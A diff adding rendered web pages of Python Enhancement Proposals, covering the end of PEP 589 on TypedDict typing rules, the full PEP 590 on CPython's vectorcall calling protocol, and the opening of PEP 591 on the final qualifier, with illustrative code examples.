class BookBasedMovie(TypedDict):
+    name: str
+    year: int
+    based_on: str
+
+
+

Here is an example of multiple inheritance:

+
class X(TypedDict):
+    x: int
+
+class Y(TypedDict):
+    y: str
+
+class XYZ(X, Y):
+    z: bool
+
+
+

The TypedDict XYZ has three items: x (type int), y +(type str), and z (type bool).

+

A TypedDict cannot inherit from both a TypedDict type and a +non-TypedDict base class.

+

Additional notes on TypedDict class inheritance:

+
    +
  • Changing a field type of a parent TypedDict class in a subclass is not allowed. +Example:
    class X(TypedDict):
    +   x: str
    +
    +class Y(X):
    +   x: int  # Type check error: cannot overwrite TypedDict field "x"
    +
    +
    +

In the example outlined above, the TypedDict class annotations return +type str for key x:

    +
    print(Y.__annotations__)  # {'x': <class 'str'>}
    +
    +
    +
  • +
  • Multiple inheritance does not allow conflicting types for the same field name:
    class X(TypedDict):
    +   x: int
    +
    +class Y(TypedDict):
    +   x: str
    +
    +class XYZ(X, Y):  # Type check error: cannot overwrite TypedDict field "x" while merging
    +   xyz: bool
    +
    +
    +
  • +
+
+
+

Totality

+

By default, all keys must be present in a TypedDict. It is possible +to override this by specifying totality. Here is how to do this +using the class-based syntax:

+
class Movie(TypedDict, total=False):
+    name: str
+    year: int
+
+
+

This means that a Movie TypedDict can have any of the keys omitted. Thus +these are valid:

+
m: Movie = {}
+m2: Movie = {'year': 2015}
+
+
+

A type checker is only expected to support a literal False or +True as the value of the total argument. True is the +default, and makes all items defined in the class body be required.

+

The totality flag only applies to items defined in the body of the +TypedDict definition. Inherited items won’t be affected, and instead +use totality of the TypedDict type where they were defined. This makes +it possible to have a combination of required and non-required keys in +a single TypedDict type.
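 
+
 
For instance, a total base class combined with a total=False subclass yields a single type with both required and non-required keys (a sketch; MovieBase is a hypothetical name):
 
+
class MovieBase(TypedDict):           # all keys required
+    name: str
+    year: int
+
+class Movie(MovieBase, total=False):  # keys defined here are non-required
+    based_on: str
+
+m: Movie = {'name': 'Blade Runner', 'year': 1982}  # OK: 'based_on' omitted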

+
+
+

Alternative Syntax

+

This PEP also proposes an alternative syntax that can be backported to +older Python versions such as 3.5 and 2.7 that don’t support the +variable definition syntax introduced in PEP 526. It +resembles the traditional syntax for defining named tuples:

+
Movie = TypedDict('Movie', {'name': str, 'year': int})
+
+
+

It is also possible to specify totality using the alternative syntax:

+
Movie = TypedDict('Movie',
+                  {'name': str, 'year': int},
+                  total=False)
+
+
+

The semantics are equivalent to the class-based syntax. This syntax +doesn’t support inheritance, however, and there is no way to +have both required and non-required fields in a single type. The +motivation for this is keeping the backwards compatible syntax as +simple as possible while covering the most common use cases.

+

A type checker is only expected to accept a dictionary display expression +as the second argument to TypedDict. In particular, a variable that +refers to a dictionary object does not need to be supported, to simplify +implementation.
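 
+
 
That is (a sketch of what checkers must accept versus need not support; Movie2 and fields are hypothetical names):
 
+
Movie = TypedDict('Movie', {'name': str, 'year': int})  # OK: dictionary display
+
+fields = {'name': str, 'year': int}
+Movie2 = TypedDict('Movie2', fields)  # Checkers need not support this form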

+
+
+

Type Consistency

+

Informally speaking, type consistency is a generalization of the +is-subtype-of relation to support the Any type. It is defined +more formally in PEP 483. This section introduces the +new, non-trivial rules needed to support type consistency for +TypedDict types.

+

First, any TypedDict type is consistent with Mapping[str, object]. +Second, a TypedDict type A is consistent with TypedDict B if +A is structurally compatible with B. This is true if and only +if both of these conditions are satisfied:

+
    +
  • For each key in B, A has the corresponding key and the +corresponding value type in A is consistent with the value type +in B. For each key in B, the value type in B is also +consistent with the corresponding value type in A.
  • +
  • For each required key in B, the corresponding key is required +in A. For each non-required key in B, the corresponding key +is not required in A.
  • +
+

Discussion:

+
    +
  • Value types behave invariantly, since TypedDict objects are mutable. +This is similar to mutable container types such as List and +Dict. Example where this is relevant:
    class A(TypedDict):
    +    x: Optional[int]
    +
    +class B(TypedDict):
    +    x: int
    +
    +def f(a: A) -> None:
    +    a['x'] = None
    +
    +b: B = {'x': 0}
    +f(b)  # Type check error: 'B' not compatible with 'A'
    +b['x'] + 1  # Runtime error: None + 1
    +
    +
    +
  • +
  • A TypedDict type with a required key is not consistent with a +TypedDict type where the same key is a non-required key, since the +latter allows keys to be deleted. Example where this is relevant:
    class A(TypedDict, total=False):
    +    x: int
    +
    +class B(TypedDict):
    +    x: int
    +
    +def f(a: A) -> None:
    +    del a['x']
    +
    +b: B = {'x': 0}
    +f(b)  # Type check error: 'B' not compatible with 'A'
    +b['x'] + 1  # Runtime KeyError: 'x'
    +
    +
    +
  • +
  • A TypedDict type A with no key 'x' is not consistent with a +TypedDict type with a non-required key 'x', since at runtime +the key 'x' could be present and have an incompatible type +(which may not be visible through A due to structural subtyping). +Example:
    class A(TypedDict, total=False):
    +    x: int
    +    y: int
    +
    +class B(TypedDict, total=False):
    +    x: int
    +
    +class C(TypedDict, total=False):
    +    x: int
    +    y: str
    +
    + def f(a: A) -> None:
    +     a['y'] = 1
    +
    + def g(b: B) -> None:
    +     f(b)  # Type check error: 'B' incompatible with 'A'
    +
    + c: C = {'x': 0, 'y': 'foo'}
    + g(c)
    + c['y'] + 'bar'  # Runtime error: int + str
    +
    +
    +
  • +
  • A TypedDict isn’t consistent with any Dict[...] type, since +dictionary types allow destructive operations, including +clear(). They also allow arbitrary keys to be set, which +would compromise type safety. Example:
    class A(TypedDict):
    +    x: int
    +
    +class B(A):
    +    y: str
    +
    +def f(d: Dict[str, int]) -> None:
    +    d['y'] = 0
    +
    +def g(a: A) -> None:
    +    f(a)  # Type check error: 'A' incompatible with Dict[str, int]
    +
    +b: B = {'x': 0, 'y': 'foo'}
    +g(b)
    +b['y'] + 'bar'  # Runtime error: int + str
    +
    +
    +
  • +
  • A TypedDict with all int values is not consistent with +Mapping[str, int], since there may be additional non-int +values not visible through the type, due to structural subtyping. +These can be accessed using the values() and items() +methods in Mapping, for example. Example:
    class A(TypedDict):
    +    x: int
    +
    +class B(TypedDict):
    +    x: int
    +    y: str
    +
    +def sum_values(m: Mapping[str, int]) -> int:
    +    n = 0
    +    for v in m.values():
    +        n += v  # Runtime error
    +    return n
    +
    +def f(a: A) -> None:
    +    sum_values(a)  # Error: 'A' incompatible with Mapping[str, int]
    +
    +b: B = {'x': 0, 'y': 'foo'}
    +f(b)
    +
    +
    +
  • +
+
+
+

Supported and Unsupported Operations

+

Type checkers should support restricted forms of most dict +operations on TypedDict objects. The guiding principle is that +operations not involving Any types should be rejected by type +checkers if they may violate runtime type safety. Here are some of +the most important type safety violations to prevent:

+
    +
  1. A required key is missing.
  2. +
  3. A value has an invalid type.
  4. +
  5. A key that is not defined in the TypedDict type is added.
  6. +
+

A key that is not a literal should generally be rejected, since its +value is unknown during type checking, and thus can cause some of the +above violations. (Use of Final Values and Literal Types +generalizes this to cover final names and literal types.)

+

The use of a key that is not known to exist should be reported as an +error, even if this wouldn’t necessarily generate a runtime type +error. These are often mistakes, and these may insert values with an +invalid type if structural subtyping hides the types of certain items. +For example, d['x'] = 1 should generate a type check error if +'x' is not a valid key for d (which is assumed to be a +TypedDict type).
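 
+
 
To illustrate (a sketch reusing the Movie type; the error comments describe expected checker behaviour, not any particular tool's output):
 
+
def update(m: Movie, key: str) -> None:
+    m['director'] = 'Ridley Scott'  # Error: 'director' is not a valid key
+    m[key] = 0                      # Error: arbitrary str key, not a literal
+    print(m.get(key))               # OK (see below): static type is 'object'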

+

Extra keys included in TypedDict object construction should also be +caught. In this example, the director key is not defined in +Movie and is expected to generate an error from a type checker:

+
m: Movie = dict(
+    name='Alien',
+    year=1979,
+    director='Ridley Scott')  # error: Unexpected key 'director'
+
+
+

Type checkers should reject the following operations on TypedDict +objects as unsafe, even though they are valid for normal dictionaries:

+
    +
  • Operations with arbitrary str keys (instead of string literals +or other expressions with known string values) should generally be +rejected. This involves both destructive operations such as setting +an item and read-only operations such as subscription expressions. +As an exception to the above rule, d.get(e) and e in d +should be allowed for TypedDict objects, for an arbitrary expression +e with type str. The motivation is that these are safe and +can be useful for introspecting TypedDict objects. The static type +of d.get(e) should be object if the string value of e +cannot be determined statically.
  • +
  • clear() is not safe since it could remove required keys, some of +which may not be directly visible because of structural +subtyping. popitem() is similarly unsafe, even if all known +keys are not required (total=False).
  • +
  • del obj['key'] should be rejected unless 'key' is a +non-required key.
  • +
+

Type checkers may allow reading an item using d['x'] even if +the key 'x' is not required, instead of requiring the use of +d.get('x') or an explicit 'x' in d check. The rationale is +that tracking the existence of keys is difficult to implement in full +generality, and that disallowing this could require many changes to +existing code.

+

The exact type checking rules are up to each type checker to decide. +In some cases potentially unsafe operations may be accepted if the +alternative is to generate false positive errors for idiomatic code.

+
+
+

Use of Final Values and Literal Types

+

Type checkers should allow final names (PEP 591) with +string values to be used instead of string literals in operations on +TypedDict objects. For example, this is valid:

+
YEAR: Final = 'year'
+
+m: Movie = {'name': 'Alien', 'year': 1979}
+years_since_epoch = m[YEAR] - 1970
+
+
+

Similarly, an expression with a suitable literal type +(PEP 586) can be used instead of a literal value:

+
def get_value(movie: Movie,
+              key: Literal['year', 'name']) -> Union[int, str]:
+    return movie[key]
+
+
+

Type checkers are only expected to support actual string literals, not +final names or literal types, for specifying keys in a TypedDict type +definition. Also, only a boolean literal can be used to specify +totality in a TypedDict definition. The motivation for this is to +make type declarations self-contained, and to simplify the +implementation of type checkers.

+
+
+
+

Backwards Compatibility

+

To retain backwards compatibility, type checkers should not infer a +TypedDict type unless it is sufficiently clear that this is desired by +the programmer. When unsure, an ordinary dictionary type should be +inferred. Otherwise existing code that type checks without errors may +start generating errors once TypedDict support is added to the type +checker, since TypedDict types are more restrictive than dictionary +types. In particular, they aren’t subtypes of dictionary types.
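 
+
 
A sketch of the intended behaviour (reusing the Movie type from earlier):
 
+
def f(d: Dict[str, object]) -> None: ...
+
+movie: Movie = {'name': 'Alien', 'year': 1979}
+f(movie)  # Error: a TypedDict is not a subtype of Dict[...]
+
+d = {'name': 'Alien', 'year': 1979}  # No TypedDict inferred: ordinary dict
+d['director'] = 'Ridley Scott'       # Existing code keeps type checking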

+
+
+

Reference Implementation

+

The mypy [2] type checker supports TypedDict types. A reference +implementation of the runtime component is provided in the +typing_extensions [3] module. The original +implementation was in the mypy_extensions [4] +module.

+
+
+

Rejected Alternatives

+

Several proposed ideas were rejected. The current set of features +seems to cover a lot of ground, and it was not clear which of the +proposed extensions would be more than marginally useful. This PEP +defines a baseline feature that can potentially be extended later.

+

These are rejected on principle, as incompatible with the spirit of +this proposal:

+
    +
  • TypedDict isn’t extensible, and it addresses only a specific use +case. TypedDict objects are regular dictionaries at runtime, and +TypedDict cannot be used with other dictionary-like or mapping-like +classes, including subclasses of dict. There is no way to add +methods to TypedDict types. The motivation here is simplicity.
  • +
  • TypedDict type definitions could plausibly be used to perform runtime +type checking of dictionaries. For example, they could be used to +validate that a JSON object conforms to the schema specified by a +TypedDict type. This PEP doesn’t include such functionality, since +the focus of this proposal is static type checking only, and other +existing types do not support this, as discussed in Class-based +syntax. Such functionality can be provided by a third-party +library using the typing_inspect [5] module, for example.
  • +
  • TypedDict types can’t be used in isinstance() or issubclass() +checks. The reasoning is similar to why runtime type checks aren’t +supported in general with many type hints.
  • +
+

These features were left out from this PEP, but they are potential +extensions to be added in the future:

+
    +
  • TypedDict doesn’t support providing a default value type for keys +that are not explicitly defined. This would allow arbitrary keys to +be used with a TypedDict object, and only explicitly enumerated keys +would receive special treatment compared to a normal, uniform +dictionary type.
  • +
  • There is no way to individually specify whether each key is required +or not. No proposed syntax was clear enough, and we expect that +there is limited need for this.
  • +
  • TypedDict can’t be used for specifying the type of a **kwargs +argument. This would allow restricting the allowed keyword +arguments and their types. According to PEP 484, using a TypedDict +type as the type of **kwargs means that the TypedDict is valid +as the value of arbitrary keyword arguments, but it doesn’t +restrict which keyword arguments should be allowed. The syntax +**kwargs: Expand[T] has been proposed for this [6].
  • +
+
+
+

Acknowledgements

+

David Foster contributed the initial implementation of TypedDict types +to mypy. Improvements to the implementation have been contributed by +at least the author (Jukka Lehtosalo), Ivan Levkivskyi, Gareth T, +Michael Lee, Dominik Miedzinski, Roy Williams and Max Moroz.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0589.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0590/index.html b/pep-0590/index.html new file mode 100644 index 00000000000..d3c708be3c1 --- /dev/null +++ b/pep-0590/index.html @@ -0,0 +1,464 @@ + + PEP 590 – Vectorcall: a fast calling protocol for CPython | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 590 – Vectorcall: a fast calling protocol for CPython

+
+
Author:
+
Mark Shannon <mark at hotpy.org>, Jeroen Demeyer <J.Demeyer at UGent.be>
+
BDFL-Delegate:
+
Petr Viktorin <encukou at gmail.com>
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
29-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at The Vectorcall Protocol.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP introduces a new C API to optimize calls of objects. +It introduces a new “vectorcall” protocol and calling convention. +This is based on the “fastcall” convention, which is already used internally by CPython. +The new features can be used by any user-defined extension class.

+

Most of the new API is private in CPython 3.8. +The plan is to finalize semantics and make it public in Python 3.9.

+

NOTE: This PEP deals only with the Python/C API, +it does not affect the Python language or standard library.

+
+
+

Motivation

+

The choice of a calling convention impacts the performance and flexibility of code on either side of the call. +Often there is tension between performance and flexibility.

+

The current tp_call [2] calling convention is sufficiently flexible to cover all cases, but its performance is poor. +The poor performance is largely a result of having to create intermediate tuples, and possibly intermediate dicts, during the call. +This is mitigated in CPython by including special-case code to speed up calls to Python and builtin functions. +Unfortunately, this means that other callables such as classes and third party extension objects are called using the +slower, more general tp_call calling convention.

+

This PEP proposes that the calling convention used internally for Python and builtin functions be generalized and published +so that all calls can benefit from better performance. +The new proposed calling convention is not fully general, but covers the large majority of calls. +It is designed to remove the overhead of temporary object creation and multiple indirections.

+

Another source of inefficiency in the tp_call convention is that it has one function pointer per class, +rather than per object. +This is inefficient for calls to classes as several intermediate objects need to be created. +For a class cls, at least one intermediate object is created for each call in the sequence +type.__call__, cls.__new__, cls.__init__.

+

This PEP proposes an interface for use by extension modules. +Such interfaces cannot effectively be tested, or designed, without having the +consumers in the loop. +For that reason, we provide private (underscore-prefixed) names. +The API may change (based on consumer feedback) in Python 3.9, where we expect +it to be finalized, and the underscores removed.

+
+
+

Specification

+
+

The function pointer type

+

Calls are made through a function pointer taking the following parameters:

+
    +
  • PyObject *callable: The called object
  • +
  • PyObject *const *args: A vector of arguments
  • +
  • size_t nargs: The number of arguments plus the optional flag PY_VECTORCALL_ARGUMENTS_OFFSET (see below)
  • +
  • PyObject *kwnames: Either NULL or a tuple with the names of the keyword arguments
  • +
+

This is implemented by the function pointer type:
 
+
typedef PyObject *(*vectorcallfunc)(PyObject *callable, PyObject *const *args,
+                                    size_t nargs, PyObject *kwnames);

+
+
+

Changes to the PyTypeObject struct

+

The unused slot printfunc tp_print is replaced with tp_vectorcall_offset. It has the type Py_ssize_t. +A new tp_flags flag is added, _Py_TPFLAGS_HAVE_VECTORCALL, +which must be set for any class that uses the vectorcall protocol.

+

If _Py_TPFLAGS_HAVE_VECTORCALL is set, then tp_vectorcall_offset must be a positive integer. +It is the offset into the object of the vectorcall function pointer of type vectorcallfunc. +This pointer may be NULL, in which case the behavior is the same as if _Py_TPFLAGS_HAVE_VECTORCALL was not set.

+

The tp_print slot is reused as the tp_vectorcall_offset slot to make it easier for external projects to backport the vectorcall protocol to earlier Python versions. +In particular, the Cython project has shown interest in doing that (see https://mail.python.org/pipermail/python-dev/2018-June/153927.html).

+
+
+

Descriptor behavior

+

One additional type flag is specified: Py_TPFLAGS_METHOD_DESCRIPTOR.

+

Py_TPFLAGS_METHOD_DESCRIPTOR should be set if the callable uses the descriptor protocol to create a bound method-like object. +This is used by the interpreter to avoid creating temporary objects when calling methods +(see _PyObject_GetMethod and the LOAD_METHOD/CALL_METHOD opcodes).

+

Concretely, if Py_TPFLAGS_METHOD_DESCRIPTOR is set for type(func), then:

+
    +
  • func.__get__(obj, cls)(*args, **kwds) (with obj not None) +must be equivalent to func(obj, *args, **kwds).
  • +
  • func.__get__(None, cls)(*args, **kwds) must be equivalent to func(*args, **kwds).
  • +
+

There are no restrictions on the object func.__get__(obj, cls). +The latter is not required to implement the vectorcall protocol.
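 
+
 
For plain Python functions, the two equivalences above can be checked directly at the Python level (a sketch, included only to illustrate the semantics the flag promises; Demo is a hypothetical class):
 
+
class Demo:
+    def method(self, x):
+        return x
+
+func = Demo.__dict__['method']
+obj = Demo()
+assert func.__get__(obj, Demo)(41) == func(obj, 41)        # bound form
+assert func.__get__(None, Demo)(obj, 41) == func(obj, 41)  # unbound form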

+
+
+

The call

+

The call takes the form ((vectorcallfunc)(((char *)o)+offset))(o, args, n, kwnames) where +offset is Py_TYPE(o)->tp_vectorcall_offset. +The caller is responsible for creating the kwnames tuple and ensuring that there are no duplicates in it.

+

n is the number of positional arguments plus possibly the PY_VECTORCALL_ARGUMENTS_OFFSET flag.

+
+
+

PY_VECTORCALL_ARGUMENTS_OFFSET

+

The flag PY_VECTORCALL_ARGUMENTS_OFFSET should be added to n +if the callee is allowed to temporarily change args[-1]. +In other words, this can be used if args points to argument 1 in the allocated vector. +The callee must restore the value of args[-1] before returning.

+

Whenever they can do so cheaply (without allocation), callers are encouraged to use PY_VECTORCALL_ARGUMENTS_OFFSET. +Doing so will allow callables such as bound methods to make their onward calls cheaply. +The bytecode interpreter already allocates space on the stack for the callable, +so it can use this trick at no additional cost.

+

See [3] for an example of how PY_VECTORCALL_ARGUMENTS_OFFSET is used by a callee to avoid allocation.

+

For getting the actual number of arguments from the parameter n, +the macro PyVectorcall_NARGS(n) must be used. +This allows for future changes or extensions.

+
+
+
+

New C API and changes to CPython

+

The following functions or macros are added to the C API:

+
    +
  • PyObject *_PyObject_Vectorcall(PyObject *obj, PyObject *const *args, size_t nargs, PyObject *keywords): +Calls obj with the given arguments. +Note that nargs may include the flag PY_VECTORCALL_ARGUMENTS_OFFSET. +The actual number of positional arguments is given by PyVectorcall_NARGS(nargs). +The argument keywords is a tuple of keyword names or NULL. +An empty tuple has the same effect as passing NULL. +This uses either the vectorcall protocol or tp_call internally; +if neither is supported, an exception is raised.
  • +
  • PyObject *PyVectorcall_Call(PyObject *obj, PyObject *tuple, PyObject *dict): +Call the object (which must support vectorcall) with the old +*args and **kwargs calling convention. +This is mostly meant to put in the tp_call slot.
  • +
  • Py_ssize_t PyVectorcall_NARGS(size_t nargs): Given a vectorcall nargs argument, +return the actual number of arguments. +Currently equivalent to nargs & ~PY_VECTORCALL_ARGUMENTS_OFFSET.
  • +
+
+

Subclassing

+

Extension types inherit the type flag _Py_TPFLAGS_HAVE_VECTORCALL +and the value tp_vectorcall_offset from the base class, +provided that they implement tp_call the same way as the base class. +Additionally, the flag Py_TPFLAGS_METHOD_DESCRIPTOR +is inherited if tp_descr_get is implemented the same way as the base class.

+

Heap types never inherit the vectorcall protocol because +that would not be safe (heap types can be changed dynamically). +This restriction may be lifted in the future, but that would require +special-casing __call__ in type.__setattr__.

+
+
+
+

Finalizing the API

+

The underscore in the names _PyObject_Vectorcall and +_Py_TPFLAGS_HAVE_VECTORCALL indicates that this API may change in minor +Python versions. +When finalized (which is planned for Python 3.9), they will be renamed to +PyObject_Vectorcall and Py_TPFLAGS_HAVE_VECTORCALL. +The old underscore-prefixed names will remain available as aliases.

+

The new API will be documented as normal, but will warn of the above.

+

Semantics for the other names introduced in this PEP (PyVectorcall_NARGS, +PyVectorcall_Call, Py_TPFLAGS_METHOD_DESCRIPTOR, +PY_VECTORCALL_ARGUMENTS_OFFSET) are final.

+
+
+

Internal CPython changes

+
+

Changes to existing classes

+

The function, builtin_function_or_method, method_descriptor, method, wrapper_descriptor, method-wrapper +classes will use the vectorcall protocol +(not all of these will be changed in the initial implementation).

+

For builtin_function_or_method and method_descriptor +(which use the PyMethodDef data structure), +one could implement a specific vectorcall wrapper for every existing calling convention. +Whether or not it is worth doing that remains to be seen.

+
+
+

Using the vectorcall protocol for classes

+

For a class cls, creating a new instance using cls(xxx) +requires multiple calls. +At least one intermediate object is created for each call in the sequence +type.__call__, cls.__new__, cls.__init__. +So it makes a lot of sense to use vectorcall for calling classes. +This really means implementing the vectorcall protocol for type. +Some of the most commonly used classes will use this protocol, +probably range, list, str, and type.

+
+
+

The PyMethodDef protocol and Argument Clinic

+

Argument Clinic [4] automatically generates wrapper functions around lower-level callables, providing safe unboxing of primitive types and +other safety checks. +Argument Clinic could be extended to generate wrapper objects conforming to the new vectorcall protocol. +This will allow execution to flow from the caller to the Argument Clinic generated wrapper and +thence to the hand-written code with only a single indirection.

+
+
+
+

Third-party extension classes using vectorcall

+

To enable call performance on a par with Python functions and built-in functions, +third-party callables should include a vectorcallfunc function pointer, +set tp_vectorcall_offset to the correct value and add the _Py_TPFLAGS_HAVE_VECTORCALL flag. +Any class that does this must implement the tp_call function and make sure its behaviour is consistent with the vectorcallfunc function. +Setting tp_call to PyVectorcall_Call is sufficient.

+
+
+

Performance implications of these changes

+

This PEP should not have much impact on the performance of existing code +(neither in the positive nor the negative sense). +It is mainly meant to allow efficient new code to be written, +not to make existing code faster.

+

Nevertheless, this PEP optimizes for METH_FASTCALL functions. +Performance of functions using METH_VARARGS will become slightly worse.

+
+
+

Stable ABI

+

Nothing from this PEP is added to the stable ABI (PEP 384).

+
+
+

Alternative Suggestions

+
+

bpo-29259

+

PEP 590 is close to what was proposed in bpo-29259 [1]. +The main difference is that this PEP stores the function pointer +in the instance rather than in the class. +This makes more sense for implementing functions in C, +where every instance corresponds to a different C function. +It also allows optimizing type.__call__, which is not possible with bpo-29259.

+
+
+

PEP 576 and PEP 580

+

Both PEP 576 and PEP 580 are designed to enable 3rd party objects to be both expressive and performant (on a par with +CPython objects). The purpose of this PEP is to provide a uniform way to call objects in the CPython ecosystem that is +both expressive and as performant as possible.

+

This PEP is broader in scope than PEP 576 and uses variable rather than fixed offset function-pointers. +The underlying calling convention is similar. Because PEP 576 only allows a fixed offset for the function pointer, +it would not allow the improvements to any objects with constraints on their layout.

+

PEP 580 proposes a major change to the PyMethodDef protocol used to define builtin functions. +This PEP provides a more general and simpler mechanism in the form of a new calling convention. +This PEP also extends the PyMethodDef protocol, but merely to formalise existing conventions.

+
+
+

Other rejected approaches

+

A longer, 6 argument, form combining both the vector and optional tuple and dictionary arguments was considered. +However, it was found that the code to convert between it and the old tp_call form was overly cumbersome and inefficient. +Also, since only 4 arguments are passed in registers on x64 Windows, the two extra arguments would have non-negligible costs.

+

Removing any special cases and making all calls use the tp_call form was also considered. +However, unless a much more efficient way was found to create and destroy tuples, and to a lesser extent dictionaries, +then it would be too slow.

+
+
+
+

Acknowledgements

+

Victor Stinner for developing the original “fastcall” calling convention internally to CPython. +This PEP codifies and extends his work.

+
+
+

References

+ +
+
+

Reference implementation

+

A minimal implementation can be found at https://github.com/markshannon/cpython/tree/vectorcall-minimal

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0590.rst

+

Last modified: 2024-06-01 20:09:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0591/index.html b/pep-0591/index.html new file mode 100644 index 00000000000..6345e680636 --- /dev/null +++ b/pep-0591/index.html @@ -0,0 +1,435 @@ + + PEP 591 – Adding a final qualifier to typing | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 591 – Adding a final qualifier to typing

+
+
Author:
+
Michael J. Sullivan <sully at msully.net>, Ivan Levkivskyi <levkivskyi at gmail.com>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
15-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+

+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see @final/@typing.final +and Final/typing.Final for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes a “final” qualifier to be added to the typing +module—in the form of a final decorator and a Final type +annotation—to serve three related purposes:

+
    +
  • Declaring that a method should not be overridden
  • +
  • Declaring that a class should not be subclassed
  • +
  • Declaring that a variable or attribute should not be reassigned
  • +
+
+
+

Motivation

+
+

The final decorator

+

The current typing module lacks a way to restrict the use of +inheritance or overriding at a typechecker level. This is a common +feature in other object-oriented languages (such as Java), and is +useful for reducing the potential space of behaviors of a class, +easing reasoning.

+

Some situations where a final class or method may be useful include:

+
    +
  • A class wasn’t designed to be subclassed or a method wasn’t designed +to be overridden. Perhaps it would not work as expected, or be +error-prone.
  • +
  • Subclassing or overriding would make code harder to understand or +maintain. For example, you may want to prevent unnecessarily tight +coupling between base classes and subclasses.
  • +
  • You want to retain the freedom to arbitrarily change the class +implementation in the future, and these changes might break +subclasses.
  • +
+
+
+

The Final annotation

+

The current typing module lacks a way to indicate that a variable +will not be assigned to. This is a useful feature in several +situations:

+
    +
  • Preventing unintended modification of module and class level +constants and documenting them as constants in a checkable way.
  • +
  • Creating a read-only attribute that may not be overridden by +subclasses. (@property can make an attribute read-only but +does not prevent overriding)
  • +
  • Allowing a name to be used in situations where ordinarily a literal +is expected (for example as a field name for NamedTuple, a tuple +of types passed to isinstance, or an argument to a function +with arguments of Literal type (PEP 586)).
  • +
+
+
+
+

Specification

+
+

The final decorator

+

The typing.final decorator is used to restrict the use of +inheritance and overriding.

+

A type checker should prohibit any class decorated with @final +from being subclassed and any method decorated with @final from +being overridden in a subclass. The method decorator version may be +used with all of instance methods, class methods, static methods, and properties.

+

For example:

+
from typing import final
+
+@final
+class Base:
+    ...
+
+class Derived(Base):  # Error: Cannot inherit from final class "Base"
+    ...
+
+
+

and:

+
from typing import final
+
+class Base:
+    @final
+    def foo(self) -> None:
+        ...
+
+class Derived(Base):
+    def foo(self) -> None:  # Error: Cannot override final attribute "foo"
+                            # (previously declared in base class "Base")
+        ...
+
+
+

For overloaded methods, @final should be placed on the +implementation (or on the first overload, for stubs):

+
from typing import Any, overload
+
+class Base:
+    @overload
+    def method(self) -> None: ...
+    @overload
+    def method(self, arg: int) -> int: ...
+    @final
+    def method(self, x=None):
+        ...
+
+
+

It is an error to use @final on a non-method function.

+
+
+

The Final annotation

+

The typing.Final type qualifier is used to indicate that a +variable or attribute should not be reassigned, redefined, or overridden.

+
+

Syntax

+

Final may be used in one of several forms:

+
    +
  • With an explicit type, using the syntax Final[<type>]. Example:
    ID: Final[float] = 1
    +
    +
    +
  • +
  • With no type annotation. Example:
    ID: Final = 1
    +
    +
    +

    The typechecker should apply its usual type inference mechanisms to +determine the type of ID (here, likely, int). Note that unlike for +generic classes this is not the same as Final[Any].

    +
  • +
  • In class bodies and stub files you can omit the right hand side and just write +ID: Final[float]. If the right hand side is omitted, there must +be an explicit type argument to Final.
  • +
  • Finally, as self.id: Final = 1 (also optionally with a type in +square brackets). This is allowed only in __init__ methods, so +that the final instance attribute is assigned only once when an +instance is created (see the sketch after this list).
  • +
+
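 
A short sketch of the last form above, where the single assignment happens in __init__ (User is a hypothetical class):
 
+
from typing import Final
+
+class User:
+    def __init__(self, id: int) -> None:
+        self.id: Final = id  # OK: final instance attribute, assigned once
+
+
+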
+
+

Semantics and examples

+

The two main rules for defining a final name are:

+
    +
  • There can be at most one final declaration per module or class for +a given attribute. There can’t be separate class-level and instance-level +constants with the same name.
  • +
  • There must be exactly one assignment to a final name.
  • +
+

This means a type checker should prevent further assignments to final +names in type-checked code:

+
from typing import Final
+
+RATE: Final = 3000
+
+class Base:
+    DEFAULT_ID: Final = 0
+
+RATE = 300  # Error: can't assign to final attribute
+Base.DEFAULT_ID = 1  # Error: can't override a final attribute
+
+
+

Note that a type checker need not allow Final declarations inside loops +since the runtime will see multiple assignments to the same variable in +subsequent iterations.

+

Additionally, a type checker should prevent final attributes from +being overridden in a subclass:

+
from typing import Final
+
+class Window:
+    BORDER_WIDTH: Final = 2.5
+    ...
+
+class ListView(Window):
+    BORDER_WIDTH = 3  # Error: can't override a final attribute
+
+
+

A final attribute declared in a class body without an initializer must +be initialized in the __init__ method (except in stub files):

+
class ImmutablePoint:
+    x: Final[int]
+    y: Final[int]  # Error: final attribute without an initializer
+
+    def __init__(self) -> None:
+        self.x = 1  # Good
+
+
+

Type checkers should infer a final attribute that is initialized in +a class body as being a class variable. Variables should not be annotated +with both ClassVar and Final.

+

Final may only be used as the outermost type in assignments or variable +annotations. Using it in any other position is an error. In particular, +Final can’t be used in annotations for function arguments:

+
x: List[Final[int]] = []  # Error!
+
+def fun(x: Final[List[int]]) ->  None:  # Error!
+    ...
+
+
+

Note that declaring a name as final only guarantees that the name will +not be re-bound to another value, but does not make the value +immutable. Immutable ABCs and containers may be used in combination +with Final to prevent mutating such values:

+
x: Final = ['a', 'b']
+x.append('c')  # OK
+
+y: Final[Sequence[str]] = ['a', 'b']
+y.append('x')  # Error: "Sequence[str]" has no attribute "append"
+z: Final = ('a', 'b')  # Also works
+
+
+

Type checkers should treat uses of a final name that was initialized +with a literal as if it was replaced by the literal. For example, the +following should be allowed:

+
from typing import NamedTuple, Final
+
+X: Final = "x"
+Y: Final = "y"
+N = NamedTuple("N", [(X, int), (Y, int)])
+
+
+
+
+
+
+

Reference Implementation

+

The mypy [1] type checker supports Final and final. A +reference implementation of the runtime component is provided in the +typing_extensions [2] module.

+
+
